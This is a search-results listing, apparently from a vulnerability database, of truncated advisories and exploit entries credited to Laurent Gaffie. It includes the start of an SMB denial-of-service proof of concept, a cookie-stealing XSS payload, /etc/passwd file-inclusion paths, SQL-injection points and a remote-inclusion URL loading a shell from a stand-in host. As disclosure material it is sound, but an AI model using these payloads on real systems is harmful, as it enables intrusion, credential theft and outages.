34 matches found
Microsoft Waits for Patch Tuesday to Fix SMB Zero Day
Microsoft will not rush out an emergency patch for a zero-day vulnerability disclosed on Wednesday in the Windows implementation of the Server Message Block protocol. Researcher Laurent Gaffie announced in a tweet, below, that he’d found a zero-day vulnerability in SMBv3 and released a...
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)
Microsoft - SMB Server Trans2 Zero Size Pool Alloc MS10-054 !/usr/bin/env python import sys,struct,socket from socket import if lensys.argv=2: print '' print ' MS10-054 Proof Of Concept by Laurent Gaffie' print ' Usage: python '+sys.argv0+' TARGET SHARE-NAME No backslash' print ' Example: python...
Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054)
Exploit for windows platform in category dos / poc =========================================================== Microsoft SMB Server Trans2 Zero Size Pool Alloc MS10-054 =========================================================== !/usr/bin/env python import sys,struct,socket from socket import if...
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)
!/usr/bin/env python import sys,struct,socket from socket import if lensys.argv=2: print '' print ' MS10-054 Proof Of Concept by Laurent Gaffie' print ' Usage: python '+sys.argv0+' TARGET SHARE-NAME No backslash' print ' Example: python '+sys.argv0+' 192.168.8.101 users' print '...
New Remote Flaw Found in SMB2 in Windows Vista and Windows 7
Researchers have found a new vulnerability in the SMB2 protocol in Windows Vista and Windows 7 that enables an attacker to remotely crash vulnerable machines. There is proof-of-concept exploit available for the vulnerability, as well. There is no patch available for the vulnerability, which affec...
Soulseek 157 NS */ 156.* Remote Distributed Search Code Execution
Exploit for unknown platform in category dos / poc ================================================================= Soulseek 157 NS / 156. Remote Distributed Search Code Execution ================================================================= ============================================= -...
Ubuntu Update for ruby1.9 vulnerability USN-691-1
Ubuntu Update for Linux kernel vulnerabilities USN-691-1 OpenVAS Vulnerability Test $Id: gbubuntuUSN6911.nasl 7969 2017-12-01 09:23:16Z santu $ Ubuntu Update for ruby1.9 vulnerability USN-691-1 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH,...
SaBlog-X 1.5 storm library vulnerability-vulnerability warning-the black bar safety net
vendor site:http://www. vbulletin. com/ product:vbulletin 3.6.6 bug: permanent xss affected file: calendar.php risk : medium xss permanent must be loggued PoC : http://127.0.0.1/vbulletin/calendar.php?do=add&type=single&c=1 - fill up the title field with : /titlescriptalertdocument. cookie/script...
xine-lib NES Sound Format Demuxer Buffer Overflow
Hi there Original advisory: http://milw0rm.com/exploits/5458 There's another stack-based buffer overflow in demuxnfs.c line 111: this-copyright = strdup&header0x4E; line 189: char copyright100; line 208: sprintfcopyright, "C s", this-copyright; Regards Laurent Gaffi...
FreeBSD : php -- multiple security vulnerabilities (392b5b1d-9471-11dc-9db7-001c2514716c)
PHP project reports : Security Enhancements and Fixes in PHP 5.2.5 : - Fixed dl to only accept filenames. Reported by Laurent Gaffie. - Fixed dl to limit argument size to MAXPATHLEN CVE-2007-4887. Reported by Laurent Gaffie. - Fixed htmlentities/htmlspecialchars not to accept partial multibyte...
phpTrafficA < 1.4.2
Application: phpTrafficA 1.4.2 Web Site: http://soft.zoneo.net/phpTrafficA/ Versions: all Platform: linux, windows Bug: injection sql , xss , full path ------------------------------------------------------- 1 Introduction 2 Bug 3 Proof of concept 4 Credits =========== 1 Introduction ===========...
pheap.txt
edit & view local file lfi + edit: /edit.php?em=file&filename=../../../../../../../../../../../../../etc/passwd regards laurent gaffié...
Plantilla PHP Simple
Plantilla PHP Simple local file include vulnerability: /zadminxx/listmainpages.php?nfolder=/etc/ file upoad vulnerability: upload any-script with a double extension .. laurent gaffie...
php web portail [remote file include & local file include]
php web portail remote file include & local file include download site: https://sourceforge.net/project/showfiles.php?groupid=178400 product:php web portail bug: remote file include & local file include risk : high local file include :...
Portail Web Php <= 2.5.1 (includes.php) Remote File Inclusion Vuln
No description provided by source. php web portail remote file include download site: https://sourceforge.net/project/showfiles.php?groupid=178400 product:php web portail bug: remote file include risk : high remote file include : /includes/includes.php?sitepath=http://site.com/shell.txt?%00 laure...
Portail Web PHP 2.5.1 - 'includes.php' Remote File Inclusion
php web portail remote file include download site: https://sourceforge.net/project/showfiles.php?groupid=178400 product:php web portail bug: remote file include risk : high remote file include : /includes/includes.php?sitepath=http://site.com/shell.txt?%00 laurent gaffié http://s-a-p.ca/ contact:...
FishCart [injection sql]
vendor site: http://fishcart.org/ product :fish cart bug:injection sql risk : medium injection sql : /display.php?cartid=200701210157208&zid=1&lid=1&olimit=5&cat=&key1=&nlst=y&olst='sql change the cartid value with yours laurent gaffie http://s-a-p.ca/ contact: [email protected]...
fishcart-sql.txt
vendor site: http://fishcart.org/ product :fish cart bug:injection sql risk : medium injection sql : /display.php?cartid=200701210157208&zid=1&lid=1&olimit=5&cat=&key1=&nlst=y&olst='sql change the cartid value with yours laurent gaffie http://s-a-p.ca/ contact: [email protected]...
abittraversed.txt
vendor site: http://www.unverse.net/abitwhizzy/ product : aBitWhizzy bug:local file include global risk : high http://site.com/abitwhizzy.php?f=../../../../../../../etc/passwd laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: [email protected]...
klf-realty [injection sql]
vendor site:http://klf-design.com/ product :klf-realty bug:injection sql risk : medium injection sql : /searchlisting.asp?category='sql /detail.asp?propertyid='sql /searchlisting.asp?agent='sql laurent gaffie & benjamin mosse http://s-a-p.ca/ contact: [email protected]...